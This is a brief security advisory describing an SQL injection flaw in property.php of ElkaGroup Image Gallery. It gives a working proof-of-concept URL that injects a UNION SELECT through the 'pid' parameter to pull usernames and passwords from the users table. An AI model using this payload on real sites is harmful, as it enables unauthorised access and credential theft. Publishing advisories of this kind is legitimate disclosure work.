ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability

ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available.

http://www.example.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users